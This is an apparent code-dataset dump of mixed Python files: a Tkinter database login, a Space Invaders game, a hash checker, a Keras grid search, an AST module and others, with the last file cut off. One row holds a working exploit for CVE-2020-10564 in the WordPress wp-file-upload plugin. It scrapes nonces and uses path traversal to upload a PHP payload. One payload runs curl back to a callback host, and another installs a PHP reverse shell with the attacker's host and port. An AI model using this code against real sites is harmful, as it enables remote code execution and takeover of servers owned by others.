index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
999,400 | 597f2180bb9613889aac4549e5e5d461d72d8177 | import tkinter as tk
from tkinter import *
from tkinter import messagebox
import mysql.connector
import main_window
root = tk.Tk()
root.title('Wypożyczalnia kostiumów - login')
w = 350
h = 175
ws = root.winfo_screenwidth() # width of the screen
hs = root.winfo_screenheight() # height of the screen
x = (ws/2) - (w/2)
y = (hs/2) - (h/2)
root.geometry('%dx%d+%d+%d' % (w, h, x, y))
blank = Label(root)
blank.pack()
login = Entry(root, width=20)
password = Entry(root, width=20, show="*")
login_label = Label(root, text="Login", width=10)
password_label = Label(root, text="Hasło")
login_label.pack()
login.pack()
password_label.pack()
password.pack()
def log_me():
    """Attempt a MySQL login with the credentials typed into the form.

    On success the login window is destroyed and the main application
    window is started; on failure an error dialog is shown.
    """
    try:
        database = mysql.connector.connect(
            host="localhost",
            user=login.get(),
            password=password.get(),
            database="wypozyczalnia_kostiumow"
        )
    except mysql.connector.Error:
        # Only connection/authentication failures should show the
        # "wrong credentials" dialog; the previous bare `except:` also
        # silently swallowed unrelated programming errors.
        messagebox.showerror("Błąd", "Wprowadzono niepoprawne dane.")
    else:
        root.destroy()
        # NOTE(review): `root` is handed over after destroy(); confirm
        # main_window does not use it as a live Tk widget.
        main_window.main_window(database, root)
blank = Label(root)
blank.pack()
login_button = Button(root, text="Zaloguj się", command=log_me)
login_button.pack()
root.mainloop()
|
999,401 | f572ce46260bf2d2527210ca427e657aab81271f | from pypal import private_globals as _pal
import ctypes as c
import weakref
from ..bodybase import BodyBase
class MeshTerrain(BodyBase):
    """Static triangle-mesh terrain body (Python 2 / ctypes bridge to PAL)."""
    def __init__(self, pos, points, triangles):
        """
        Constructs a static mesh terrain and adds it to the world.
        pos: a 3 part tuple with x,y,z.
        points: sequence of 3-part vertex tuples (x, y, z).
        triangles: sequence of 3-part index tuples into `points`.
        """
        # Flatten the vertices into a ctypes float array (Python 2: xrange).
        CPoints = c.c_float * (len(points) * 3)
        cpoints = CPoints()
        for i in xrange(len(points)):
            for j in xrange(3):
                cpoints[(i*3)+j] = points[i][j]
        # Flatten the triangle indices into a ctypes int array.
        # NOTE(review): len(triangles*3) builds a temporary tripled list just
        # to measure it; the value is simply len(triangles)*3.
        CTris = c.c_int * len(triangles*3)
        ctris = CTris()
        for i in xrange(len(triangles)):
            for j in xrange(3):
                ctris[(i*3)+j] = triangles[i][j]
        # Hand the flattened buffers to the native PAL library.
        self.obj = _pal.lib.body_static_mesh_terrain_create(c.c_float(pos[0]), c.c_float(pos[1]), c.c_float(pos[2]),
            c.pointer(cpoints),len(points)*3, c.pointer(ctris), len(triangles)*3)
        self.points = points
        self._body_base = _pal.lib.cast_static_mesh_terrain_body_base(self.obj)
    def __str__(self):
        x, y, z = self.get_position()
        return "A Mesh Terrain at : %.2f, %.2f, %.2f" % (x, y, z)
    def get_size(self):
        """returns the size of the object in a 3 part tuple"""
        # NOTE(review): self._size is never assigned in this class, so this
        # raises AttributeError unless a base class sets it — confirm.
        return self._size |
999,402 | ddf899f373a043f9981ccb16a10e1f0078142643 | #Escribir un programa que pregunte el nombre del usuario en la consola y un número entero e imprima por pantalla en líneas distintas el nombre del usuario tantas veces como el número introducido.
name = input('Ingrese su nombre: ')
repet = int(input('Ingrese cuantas veces se tiene que repetir: '))
if repet <= 0 :
print('Ingresaste un numero incorrecto')
else:
print((name+"\n") * repet) |
999,403 | 22031aad62185b90e6d0fc1c0b10002b9927f49d | from spdk.rpc.client import print_json
def perform_tests(args):
    """Invoke the SPDK 'perform_tests' RPC and pretty-print its JSON reply."""
    print_json(args.client.call('perform_tests'))
def spdk_rpc_plugin_initialize(subparsers):
    """Register the 'perform_tests' subcommand on the SPDK rpc.py CLI."""
    p = subparsers.add_parser('perform_tests',
                              help='Returns true when hotplug apps starts running IO')
    p.set_defaults(func=perform_tests)
|
999,404 | 2131562a7c99dc951cf8f8affcd6c9268cdb89df | import json
import requests
import uuid
from Framework.Library.Function.Function.PocSuite.lib.utils import random_str
import binascii
from Framework.Valueconfig import FORMATTIME, ValueStatus
from Framework.Library.Function.Function.PocSuite.api import paths
class file_upload:
def __init__(self, url):
self.url = url
def check_version(self):
url =self.url + "/wp-content/plugins/wp-file-upload/readme.txt"
resp = requests.get(url, verify=False)
if resp.status_code != 200 :
return False
fixed_version = 4.13
try:
current_version = resp.text.split("== Changelog ==")[1].split("= ")[1].split(" =")[0]
if current_version < str(fixed_version):
return True
else:
return False
except: return False
def exploit(self, php_shell):
page = requests.get(self.url, timeout=5, verify=False)
cookie = page.cookies
print("[+] Plugin url: " + self.url)
filename = random_str(6) + ".txt"
payload = "../plugins/wp-file-upload/lib/" + filename
payload = binascii.hexlify(payload.encode())
nonce = ''
params_index = ''
session_token = ''
if 'wfu_uploader_nonce"' in page.text:
idx = page.text.find('wfu_uploader_nonce" value="') + len('wfu_uploader_nonce" value="')
nonce = page.text[idx:idx+20].split('"')[0]
print("[+] Retrived nonce parameter: " + nonce)
if 'params_index:"' in page.text:
idx = page.text.find('params_index:"') + len('params_index:"')
params_index = page.text[idx:idx+30].split('"')[0]
print("[+] Retrived params_index parameter: " + params_index)
if 'session:"' in page.text:
idx = page.text.find('session:"') + len('session:"')
session_token = page.text[idx:idx+65].split('"')[0]
print("[+] Retrived session_token parameter: " + session_token)
fsize = str(len(php_shell))
admin_ajax_url = self.url + "/wp-admin/admin-ajax.php"
d = {
"action":"wfu_ajax_action_ask_server", "session_token":session_token,
"sid":"1", "unique_id":"KpNKThIx0T", "wfu_uploader_nonce":nonce,
"filenames":payload, "filesizes":fsize
}
resp = requests.post(admin_ajax_url, data=d, cookies=cookie, timeout=5)
if "wfu_askserver_success" in resp.text:
print("[+] Stage 1 success :)")
else:
print("[-] Something went wrong :/")
### stage 2 ###
params = {
"wfu_uploader_nonce":(None,nonce), "action":(None,"wfu_ajax_action"),
"uploadedfile_1_index":(None,"0"), "uploadedfile_1_size":(None,fsize),
"subdir_sel_index":(None,"-1"), "nofileupload_1":(None,"0"), "only_check":(None,"1"),
"session_token":(None,session_token), "uploadedfile_1_name": (None,payload),
"params_index":(None,params_index), "uniqueuploadid_1":(None,"KpNKThIx0T")
}
resp = requests.post(admin_ajax_url, files=params, cookies=cookie, timeout=5)
if "wfu_fileupload_success" in resp.text:
print("[+] Stage 2 work fine :)")
else:
print("[-] Something went wrong :/")
### stage 3 ###
params = {
"wfu_uploader_nonce":(None,nonce), "action":(None,"wfu_ajax_action"),
"uploadedfile_1_index":(None,"0"), "uploadedfile_1_size":(None,fsize),
"subdir_sel_index":(None,"-1"), "nofileupload_1":(None,"0"), "only_check":(None,"0"),
"session_token":(None,session_token), "uploadedfile_1_name": (None,payload),
"params_index":(None,params_index), "uniqueuploadid_1":(None,"KpNKThIx0T"),
"uploadedfile_1":php_shell
}
resp = requests.post(admin_ajax_url, files=params, cookies=cookie, timeout=5)
if "wfu_fileupload_success" in resp.text:
page = requests.get(self.url, timeout=5)
print("[+] Stage 3 work prefectly :)")
print("[+] We should have our webshell, gonna check it!")
else:
print("[-] Something went wrong :/")
def verify(url):
result = file_upload(url)
return result.check_version()
def attack(url, host_check_connect):
result = file_upload(url)
flag = str(uuid.uuid4().hex)
php_code = '''<?php system("curl '''+ host_check_connect + '''/requestbin?data='''+ flag + '''"); ?>'''
result.exploit(php_code)
data_request_log = {
"data": "{}".format(flag)
}
host_check = "{}/logrequestbin".format(host_check_connect)
check = requests.get(host_check,params=data_request_log)
if check.status_code == 200:
data = json.loads(check.text)
if data['status'] == ValueStatus.Success:
return True, php_code
else:
return False, php_code
def shell(vul_url, lhost, lport):
with open(paths.POCSUITE_ROOT_PATH+ "/init_pocs/cve_2020_10564/php-reverse-shell-source.php", "rb") as file:
shell = file.read().decode()
file.close()
php_shell = shell.replace('LHOST_cve_2020_10564', lhost)
php_shell = php_shell.replace('LPORT_cve_2020_10564', lport)
result = file_upload(vul_url)
result.exploit(php_shell)
return True
|
999,405 | b761a695904f8fc0212718bb5792d3fcbbd0cf22 | #!/usr/bin/python
import re
import os
rootdir='/home/gagan/stockquotes'
newdir='/home/gagan/newstockquotes'
def modify(line):
    """Rewrite one quote line: drop the first bracketed field, drop fields
    7-12, and round the second comma-separated value of fields 2-5 to the
    nearest integer.

    Returns the rewritten line (with trailing newline), or None when the
    line contains no [...] groups.
    """
    # Raw string fixes the invalid '\[' escape (DeprecationWarning on py3).
    s = re.findall(r"\[(.*?)\]", line)
    if not s:
        return
    del s[0]
    del s[6:12]
    # NOTE(review): assumes at least 5 fields remain; shorter lines raise
    # IndexError, matching the original behavior.
    for i in range(1, 5):
        p = s[i].split(',')
        # Round half-up by adding 0.5 before truncation.
        p[1] = str(int(float(p[1]) + 0.5))
        s[i] = ','.join(p)
    return '[' + "],[".join(s) + ']\n'
# Rewrite every quote file from rootdir into newdir via modify().
for subdir, dirs, files in os.walk(rootdir):
    for file in files:
        with open(os.path.join(rootdir, file), 'r') as src:
            lines = src.readlines()
        with open(os.path.join(newdir, file), 'a') as out:
            for line in lines:
                newline = modify(line)
                # modify() returns None for lines without bracketed fields;
                # the original wrote that None and crashed with TypeError.
                if newline is not None:
                    out.write(newline)
# Clean up editor backup files (*~) left in the output directory.
filelist = [f for f in os.listdir(newdir) if f.endswith('~')]
for f in filelist:
    os.remove(os.path.join(newdir, f))
|
999,406 | d8a498cab50262f999ef17afee7a1442794e9832 | from web_app import app
|
999,407 | 6e09ca91ae1c178b3f18591263485247c2e16364 | from model import Account
import unittest
class TestModel(unittest.TestCase):
    """Unit tests for the Account model (constructor, deposit, withdraw, info)."""

    @staticmethod
    def _fresh_account():
        # Every test starts from the same zero-balance account.
        return Account("4221", "333409", 0)

    def test_constructor(self):
        acct = self._fresh_account()
        self.assertEqual(acct.pin, "4221")
        self.assertEqual(acct.account_num, "333409")
        self.assertEqual(acct.balance, 0)

    def test_deposit(self):
        acct = self._fresh_account()
        acct.deposit(1000)
        self.assertEqual(acct.balance, 1000)
        # Non-positive amounts must be rejected.
        self.assertRaises(ValueError, acct.deposit, -2000)
        self.assertRaises(ValueError, acct.deposit, 0)

    def test_withdraw(self):
        acct = self._fresh_account()
        # Withdrawing more than the balance must be rejected.
        self.assertRaises(ValueError, acct.withdraw, 1000)

    def test_view_info(self):
        acct = self._fresh_account()
        expected = "\n***Your current balance in account #{} is: ${}.***\n".format(
            acct.account_num, acct.balance)
        self.assertEqual(acct.view_info(), expected)
|
999,408 | ee1fbf490e6c6051e5c4640fc9675a827ed6ceea | #!/usr/bin/env python
# coding=utf-8
# Copyright 2022 The HuggingFace Team All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Create a VisionEncoderDecoderModel instance from pretrained encoder/decoder models.
The cross-attention will be randomly initialized.
"""
from dataclasses import dataclass, field
from typing import Optional
from transformers import AutoConfig, AutoImageProcessor, AutoTokenizer, FlaxVisionEncoderDecoderModel, HfArgumentParser
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch.
"""
output_dir: str = field(
metadata={"help": "The output directory where the model will be written."},
)
encoder_model_name_or_path: str = field(
metadata={
"help": (
"The encoder model checkpoint for weights initialization."
"Don't set if you want to train an encoder model from scratch."
)
},
)
decoder_model_name_or_path: str = field(
metadata={
"help": (
"The decoder model checkpoint for weights initialization."
"Don't set if you want to train a decoder model from scratch."
)
},
)
encoder_config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained encoder config name or path if not the same as encoder_model_name"}
)
decoder_config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained decoder config name or path if not the same as decoder_model_name"}
)
def main():
    """Create a FlaxVisionEncoderDecoderModel from pretrained encoder/decoder
    checkpoints (cross-attention randomly initialized) and save it together
    with its image processor and tokenizer."""
    parser = HfArgumentParser((ModelArguments,))
    (model_args,) = parser.parse_args_into_dataclasses()

    # Prefer an explicitly specified config name; otherwise fall back to the
    # config shipped with the pretrained checkpoint.
    encoder_config = AutoConfig.from_pretrained(
        model_args.encoder_config_name or model_args.encoder_model_name_or_path
    )
    decoder_config = AutoConfig.from_pretrained(
        model_args.decoder_config_name or model_args.decoder_model_name_or_path
    )

    # Necessary for `from_encoder_decoder_pretrained` when `decoder_config`
    # is passed explicitly.
    decoder_config.is_decoder = True
    decoder_config.add_cross_attention = True

    model = FlaxVisionEncoderDecoderModel.from_encoder_decoder_pretrained(
        encoder_pretrained_model_name_or_path=model_args.encoder_model_name_or_path,
        decoder_pretrained_model_name_or_path=model_args.decoder_model_name_or_path,
        encoder_config=encoder_config,
        decoder_config=decoder_config,
    )

    # GPT2 only has bos/eos tokens but not decoder_start/pad tokens.
    decoder_start_token_id = decoder_config.decoder_start_token_id
    if decoder_start_token_id is None:
        decoder_start_token_id = decoder_config.bos_token_id
    pad_token_id = decoder_config.pad_token_id
    if pad_token_id is None:
        pad_token_id = decoder_config.eos_token_id

    # This is necessary to make Flax's generate() work.
    model.config.eos_token_id = decoder_config.eos_token_id
    model.config.decoder_start_token_id = decoder_start_token_id
    model.config.pad_token_id = pad_token_id

    image_processor = AutoImageProcessor.from_pretrained(model_args.encoder_model_name_or_path)
    tokenizer = AutoTokenizer.from_pretrained(model_args.decoder_model_name_or_path)
    tokenizer.pad_token = tokenizer.convert_ids_to_tokens(model.config.pad_token_id)

    model.save_pretrained(model_args.output_dir)
    image_processor.save_pretrained(model_args.output_dir)
    tokenizer.save_pretrained(model_args.output_dir)
if __name__ == "__main__":
main()
|
999,409 | 029513a81f8d96e2ba15514c199c2de042019e47 | import os
from xml.etree import ElementTree
from stemming.porter2 import stem
import string
from nltk.corpus import wordnet as wn
import re
from constants import *
from scipy.linalg import *
from scipy.spatial import distance
from numpy import *
import string
import enchant
def enrich(queryString):
    '''
    Enrich the query string by adding WordNet synonyms of every word.
    '''
    tokens = queryString.split(" ")
    enriched = set(tokens)
    for token in tokens:
        # Keep the head word of each synset's name ("dog.n.01" -> "dog").
        enriched.update(syn.name.split('.')[0] for syn in wn.synsets(token))
    return " ".join(enriched)
def destroyer(filename):
    '''
    Used by deleter.py: delete the XML file when it contains no non-empty
    <documentation> element. Returns 1 if the file was deleted, 0 otherwise.
    '''
    with open(filename, 'rt') as f:
        tree = ElementTree.parse(f)
    toDelete = 1
    for node in tree.iter():
        # Ignore the namespace prefix, if any.
        if '}' in node.tag:
            tag = node.tag.split('}')[1]
        else:
            tag = node.tag
        if tag == 'documentation' and node.text:
            toDelete = 0
            break
    if toDelete:
        # os.remove replaces the old os.system('rm ' + filename), which
        # broke on filenames with spaces/shell metacharacters and was an
        # avoidable (and injectable) shell invocation.
        os.remove(filename)
    return toDelete
def parseXmlDoc(filename):
    '''
    Collect the text of every <documentation> element in the XML file,
    joined with spaces and ASCII-encoded.
    '''
    with open(filename, 'rt') as f:
        tree = ElementTree.parse(f)
    docList = []
    for node in tree.iter():
        # Strip the namespace prefix when present.
        tag = node.tag.split('}')[1] if '}' in node.tag else node.tag
        if tag == 'documentation' and node.text:
            docList.append(node.text)
    joined = ' '.join(docList)
    return joined.encode('ascii', 'ignore')  # drop any non-ascii characters
def parseXmlElements(filename):
    '''
    Collect <element name="..."> attribute values from the XML file and
    return them split into words (useful for files without documentation).
    '''
    with open(filename, 'rt') as f:
        tree = ElementTree.parse(f)
    names = set()
    for node in tree.iter():
        # Strip the namespace prefix when present.
        tag = node.tag.split('}')[1] if '}' in node.tag else node.tag
        if tag == 'element' and node.get("name"):
            names.add(node.get("name"))
    # Set iteration order is unspecified, matching the original behavior.
    joined = ' '.join(names)
    return camelCaseSplitter(joined.encode('ascii', 'ignore'))
class TextProcessor:
    """Normalizes raw documentation text into stemmed, dictionary-checked words.

    NOTE: Python 2 only — string.maketrans/str.translate(table, deletechars)
    below have a different signature on Python 3.
    """
    def __init__(self):
        # US-English dictionary used to drop tokens that are not real words.
        self.d = enchant.Dict("en_US")
    def processText(self, docText):
        """Return a list of stemmed words from `docText` after cleanup."""
        # Force ascii, flatten newlines, lowercase.
        text = docText.encode('ascii', 'ignore').strip().replace("\n"," ").lower()
        # Remove html tags.
        text = re.sub('<[^>]*>', '', text)
        # Remove &...; html entities.
        text = re.sub('&[^;]*;', '', text)
        # Collapse multiple spaces.
        text = re.sub(' +',' ', text)
        # Strip punctuation (Python 2 translate signature: table + deletechars).
        text = text.translate(string.maketrans("",""), string.punctuation)
        # Keep alphabetic, non-stop-word tokens of reasonable length, then stem.
        words = [word for word in text.split(' ')\
            if word not in STOP_WORDS and all([c.isalpha() for c in word]) and len(word) > 2 and len(word) < 20]
        words = [word for word in words if self.d.check(word)]
        return [stem(word) for word in words]
def camelCaseSplitter(docString):
    '''
    Break a camelCase string into space-separated lowercase words (used on
    element tag-name data); words of two characters or fewer are dropped.
    '''
    # Insert underscores at the case boundaries, then lowercase and split.
    spaced = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', docString)
    spaced = re.sub('([a-z0-9])([A-Z])', r'\1_\2', spaced).lower()
    words = [w.strip() for w in spaced.split('_') if len(w) > 2]
    return ' '.join(words)
'''
Below are various distance metrics
'''
def getSimilarityFunction(metric):
    '''Map a metric identifier onto the matching scipy distance function;
    anything unrecognized falls back to normalizedEuclidean.'''
    dispatch = {
        COSINE: distance.cosine,
        CHEBYSHEV: distance.chebyshev,
        CORRELATION: distance.correlation,
    }
    return dispatch.get(metric, normalizedEuclidean)
def normalizedEuclidean(vec1, vec2):
    # Plain Euclidean (L2) distance ||vec1 - vec2||; `norm` comes from the
    # module-level `from scipy.linalg import *`.
    return norm(vec1 - vec2)
|
999,410 | 56c27ab607dae80411b26edea72595da65dbb62e | import pygame
import random
import math
from pygame import mixer
import os
#for playing with sounds in pygame
#initialize pygame
pygame.init()
#print(f'mixer init: {pygame.mixer.init()}')
pygame.mixer.init()
#clock = pygame.time.Clock()
#create a screen W H
screen = pygame.display.set_mode((800,600))
#adding background to our game
background = pygame.image.load('/home/hoddie/Desktop/Questions/Practice/PythonGame/background1.png')
#we load the background sound here
mixer.music.load('background.wav')
mixer.music.play(-1)
#change the title and icon of our window
pygame.display.set_caption('Space invaders')
#adding icon
icon = pygame.image.load('/home/hoddie/Desktop/Questions/Practice/PythonGame/ufo.png')
pygame.display.set_icon(icon)
#adding the player image
playerimg = pygame.image.load('/home/hoddie/Desktop/Questions/Practice/PythonGame/space-invaders.png')
playerX = 370 #the reason for the values in the varibale playerX and Player Y
playerY = 480 # is we want the player to show up somewehre on the screen in our case we want the center
#change in x
playerX_change = 0
#Enemy
enemyimg = []
enemy_X = []
enemy_Y = []
enemyX_change = []
enemyY_change = []
numofenemies = 6
for i in range(numofenemies):
enemyimg.append(pygame.image.load('/home/hoddie/Desktop/Questions/Practice/PythonGame/monster.png'))
enemy_X.append(random.randint(0, 735 ))#the random lets us spawn enemies any where on the screen
enemy_Y.append(random.randint(50, 150))
enemyX_change.append(5)
enemyY_change.append(45)
#BUllets
#ready state you cannot see the bullet on the screen
#fire the bullet is currently moving
bulletimg = pygame.image.load('/home/hoddie/Desktop/Questions/Practice/PythonGame/bullet.png')
bullet_X = 0
bullet_Y = 480
bulletX_change = 0
bulletY_change = 20
bullet_state = 'ready'
#score
score_value = 0
font = pygame.font.Font('/home/hoddie/Desktop/Questions/Practice/PythonGame/dark_tales/Dark Tales.otf', 32) #here were using the inbuilt free font and givingit a size
textX = 10 #these are the x and y values of where you wna tyour text to appear on the screen
textY = 10
#in the function we fist have to render the score before we blit the score on to the screen
def showscore(x, y):
    """Render the current score in white and blit it at (x, y)."""
    rendered = font.render('Score : ' + str(score_value), True, (255, 255, 255))
    screen.blit(rendered, (x, y))
def enemy(x, y, i):
    # Draw enemy sprite number i at (x, y).
    screen.blit(enemyimg[i],(x, y))
def fire_bullet(x,y):
    # Switch the global bullet state to 'fire' and draw the bullet offset
    # so it leaves from the middle of the ship sprite.
    global bullet_state
    bullet_state = 'fire'
    screen.blit(bulletimg, (x + 16, y + 10))
def isCollision(enemy_X, enemy_Y, bullet_X, bullet_Y):
    """Return True when the bullet and enemy centers are closer than 27 px."""
    # math.hypot computes the Euclidean distance directly — clearer and
    # numerically safer than sqrt(pow(..) + pow(..)).
    return math.hypot(enemy_X - bullet_X, enemy_Y - bullet_Y) < 27
def player(x,y):
    # Draw the player's ship sprite at (x, y).
    screen.blit(playerimg,(x, y))
#game loop makes sure the game is always running unless the quit is clicked
# Main game loop: runs until the window is closed.
running = True
while running:
    # Repaint the frame background first; everything drawn afterwards
    # appears on top of it.
    screen.fill((0, 0, 0))
    screen.blit(background, (0, 0))

    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False
        # Keyboard handling: arrow keys move the player, space fires.
        if event.type == pygame.KEYDOWN:
            print('a keystrokes is pressed')
            if event.key == pygame.K_LEFT:
                print('Left arrow is pressed')
                playerX_change = -10
            if event.key == pygame.K_RIGHT:
                print('right arrow is pressed')
                playerX_change = 10
            if event.key == pygame.K_SPACE:
                # BUG FIX: the original compared strings with `is`
                # (identity); that is not guaranteed to work — use ==.
                if bullet_state == 'ready':
                    # The bullet starts from the player's current x position.
                    bullet_X = playerX
                    fire_bullet(bullet_X, bullet_Y)
        if event.type == pygame.KEYUP:
            if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:
                print('keystroke has be released')
                playerX_change = 0

    # Keep the player's ship inside the 800px-wide window (sprite is 64px).
    playerX += playerX_change
    if playerX <= 0:
        playerX = 0
    elif playerX >= 736:
        playerX = 736

    # Move the enemies: bounce off the window edges and step downwards.
    for i in range(numofenemies):
        enemy_X[i] += enemyX_change[i]
        if enemy_X[i] <= 0:
            enemyX_change[i] = 5
            enemy_Y[i] += enemyY_change[i]
        elif enemy_X[i] >= 736:
            enemyX_change[i] = -5
            enemy_Y[i] += enemyY_change[i]

        # On a hit: reset the bullet, bump the score, respawn the enemy.
        collision = isCollision(enemy_X[i], enemy_Y[i], bullet_X, bullet_Y)
        if collision:
            bullet_Y = 480
            bullet_state = "ready"
            score_value += 1
            print(score_value)
            enemy_X[i] = random.randint(0, 735)
            enemy_Y[i] = random.randint(50, 150)
        enemy(enemy_X[i], enemy_Y[i], i)

    # Bullet movement: reset once it leaves the top of the screen.
    if bullet_Y <= 0:
        bullet_Y = 480
        bullet_state = "ready"
    if bullet_state == "fire":  # BUG FIX: was `is "fire"` (identity compare)
        fire_bullet(bullet_X, bullet_Y)
        bullet_Y -= bulletY_change

    player(playerX, playerY)
    showscore(textX, textY)
    # Flush this frame's drawing to the display.
    pygame.display.update()
|
999,411 | 91cd0f37e6c076c3388bf58798b335fac101a49c | import sys
import hashlib
if __name__ == '__main__':
if len(sys.argv) != 3:
print("Invalid number of arguments")
print("Usage: integrity.py path_to_file path_to_dir ")
sys.exit()
else:
path_to_file = sys.argv[1]
path_to_dir = sys.argv[2]
if path_to_dir[-1] != '/':
path_to_dir += '/'
try:
with open(path_to_file, 'r') as f:
for line in f:
if len(line.split()) == 3:
filename = line.strip().split()[0]
algorithm = line.strip().split()[1]
hash = line.strip().split()[2]
BUF_SIZE = 65536
md5 = hashlib.md5()
sha1 = hashlib.sha1()
sha256 = hashlib.sha256()
hash_sum = ''
try:
with open(path_to_dir + filename, 'rb') as f2:
while True:
data = f2.read(BUF_SIZE)
if not data:
break
md5.update(data)
sha1.update(data)
sha256.update(data)
if algorithm == 'md5':
hash_sum = md5.hexdigest()
elif algorithm == 'sha1':
hash_sum = sha1.hexdigest()
elif algorithm == 'sha256':
hash_sum = sha256.hexdigest()
else:
print(filename, "WRONG HASHING ALGORITHM")
if hash == hash_sum:
print(filename, "OK")
else:
print(filename, "FAIL")
except FileNotFoundError as e:
print(filename, "NOT FOUND")
else:
print(filename, "WRONG INPUT FORMAT")
except FileNotFoundError as e:
print(e)
sys.exit() |
999,412 | d70d64cf71d0607b655e240b4e8646d108a4d81c | import time
import unittest2
from selenium import webdriver
class loginTest(unittest2.TestCase):
    """Selenium UI test of the site's login flow (shared Chrome session)."""
    def test_login(self):
        # NOTE(review): find_element_by_* helpers were removed in Selenium
        # 4.3+; this code assumes an older selenium release — confirm.
        self.driver.find_element_by_id("username").send_keys("changcheng")
        self.driver.find_element_by_id("password").send_keys("111111")
        self.driver.find_element_by_class_name("login_btn").click()
        # Crude wait for the post-login page to load.
        time.sleep(3)
        print(self.driver.title)
        print(self.driver.current_url)
        # Greeting text shown in the top navigation after a successful login.
        welcome=self.driver.find_element_by_css_selector(".site-nav-right.fr>a:nth-child(1)").text
        print(welcome)
        # Label of the search button.
        search=self.driver.find_element_by_css_selector(".btn1").get_attribute("value")
        print(search)
        self.assertEqual("我的会员中心",self.driver.title)
        self.assertEqual("http://127.0.0.1/index.php?m=user&c=index&a=index",self.driver.current_url)
        self.assertEqual("您好 changcheng",welcome)
        self.assertEqual("搜索",search )
    @classmethod
    def setUpClass(cls):
        # One shared browser session for the whole test class.
        cls.driver=webdriver.Chrome()
        cls.driver.get("http://127.0.0.1/index.php?m=user&c=public&a=login")
        cls.driver.implicitly_wait(3)
        cls.driver.maximize_window()
    @classmethod
    def tearDownClass(cls):
        cls.driver.quit()
|
999,413 | f22aa93464cc6c93acd5f1ebc5e531d29448ffc7 | """
ANN implementation (Keras).
"""
import keras # DNN library
from preprocessing import * # Data preprocessing
from keras.models import Sequential # ANN model
from keras.layers import Dense # ANN layers
from keras.layers import Dropout # ANN regulatization
from keras.wrappers.scikit_learn import KerasClassifier
from sklearn.model_selection import GridSearchCV
# Integrate ANN with k-fold
def build_classifier(optimizer):
    """Build and compile the binary-classification ANN: 11 inputs -> 6 -> 6 -> 1.

    `optimizer` is injected by GridSearchCV so it can be tuned as a
    hyperparameter.
    """
    classifier = Sequential()
    classifier.add(Dense(activation="relu", input_dim=11, units=6, kernel_initializer="uniform"))
    classifier.add(Dropout(rate=0.1))  # regularization against overfitting
    classifier.add(Dense(activation="relu", units=6, kernel_initializer="uniform"))
    classifier.add(Dropout(rate=0.1))
    # Sigmoid output for a single binary label.
    classifier.add(Dense(activation="sigmoid", units=1, kernel_initializer="uniform"))
    classifier.compile(optimizer=optimizer, loss="binary_crossentropy", metrics=["accuracy"])
    return classifier
# Wrap classifier with GridSearchCV object with
# cross validation implementation
classifier = KerasClassifier(build_fn=build_classifier)
parameters = {"batch_size": [25, 32], "epochs": [100, 500], "optimizer": ["adam", "rmsprop"]}
grid_search = GridSearchCV(estimator=classifier,
param_grid=parameters,
scoring="accuracy",
cv=10)
grid_search = grid_search.fit(x_train, y_train)
best_parameters = grid_search.best_params_
best_accuracy = grid_search.best_score_
print("Parameters: ", best_parameters)
print("Best accuracy: ", best_accuracy)
|
999,414 | 18251106888ee4cba47f66550122f993c3e10ea4 | # AST nodes for micro-ML.
#
# Eli Bendersky [http://eli.thegreenplace.net]
# This code is in the public domain.
class ASTNode:
    """Base class for all micro-ML AST nodes."""
    def visit_children(self, func):
        """Visit all children with a function that takes a child node."""
        for child in self._children:
            func(child)
    # Used by the type inference algorithm.
    _type = None
    # Used by passes that traverse the AST. Each concrete node class lists the
    # sub-nodes it has as children.
    # NOTE: class-level default shared by all nodes; concrete classes replace
    # it with an instance attribute in __init__ and must not mutate it in place.
    _children = []
class IntConstant(ASTNode):
    """Integer literal node."""
    def __init__(self, value):
        self.value = value
    def __str__(self):
        return str(self.value)
class BoolConstant(ASTNode):
    """Boolean literal node."""
    def __init__(self, value):
        self.value = value
    def __str__(self):
        return str(self.value)
class Identifier(ASTNode):
    """Name-reference node."""
    def __init__(self, name):
        self.name = name
    def __str__(self):
        return self.name
class OpExpr(ASTNode):
    """Binary operation between expressions."""
    def __init__(self, op, left, right):
        self.op = op
        self.left = left
        self.right = right
        # Children: both operand expressions.
        self._children = [left, right]

    def __str__(self):
        return '(%s %s %s)' % (self.left, self.op, self.right)
class AppExpr(ASTNode):
    """Application of a function to a sequence of arguments.

    func is a node, args is a sequence of nodes.
    """
    def __init__(self, func, args=()):
        self.func = func
        self.args = args
        # Children: the function expression followed by each argument.
        self._children = [func] + list(args)

    def __str__(self):
        arglist = ', '.join(str(a) for a in self.args)
        return 'App(%s, [%s])' % (self.func, arglist)
class IfExpr(ASTNode):
    """if ... then ... else ... expression."""
    def __init__(self, ifexpr, thenexpr, elseexpr):
        self.ifexpr = ifexpr
        self.thenexpr = thenexpr
        self.elseexpr = elseexpr
        self._children = [ifexpr, thenexpr, elseexpr]

    def __str__(self):
        return 'If(%s, %s, %s)' % (self.ifexpr, self.thenexpr, self.elseexpr)
class LambdaExpr(ASTNode):
    """lambda [args] -> expr"""
    def __init__(self, argnames, expr):
        self.argnames = argnames
        self.expr = expr
        # Only the body is a child node; argnames are plain strings.
        self._children = [expr]

    def __str__(self):
        return 'Lambda([%s], %s)' % (', '.join(self.argnames), self.expr)

    # Used by the type inference algorithm to map discovered types for the
    # arguments of the lambda. Since we list arguments as names (strings) and
    # not ASTNodes, we can't keep their _type on the node.
    _arg_types = None
class Decl(ASTNode):
    """Declaration mapping name = expr.

    For functions expr is a Lambda node.
    """
    def __init__(self, name, expr):
        self.name = name
        self.expr = expr
        self._children = [expr]

    def __str__(self):
        return 'Decl(%s, %s)' % (self.name, self.expr)
|
999,415 | e9230402b95a6df30f8be617f74146dcf7d7b2be | # delete
import pymysql.cursors
# Delete one row from `pessoa` by its id, read interactively.
conexao = None
try:
    conexao = pymysql.connect(
        host = "localhost",
        user = "root",
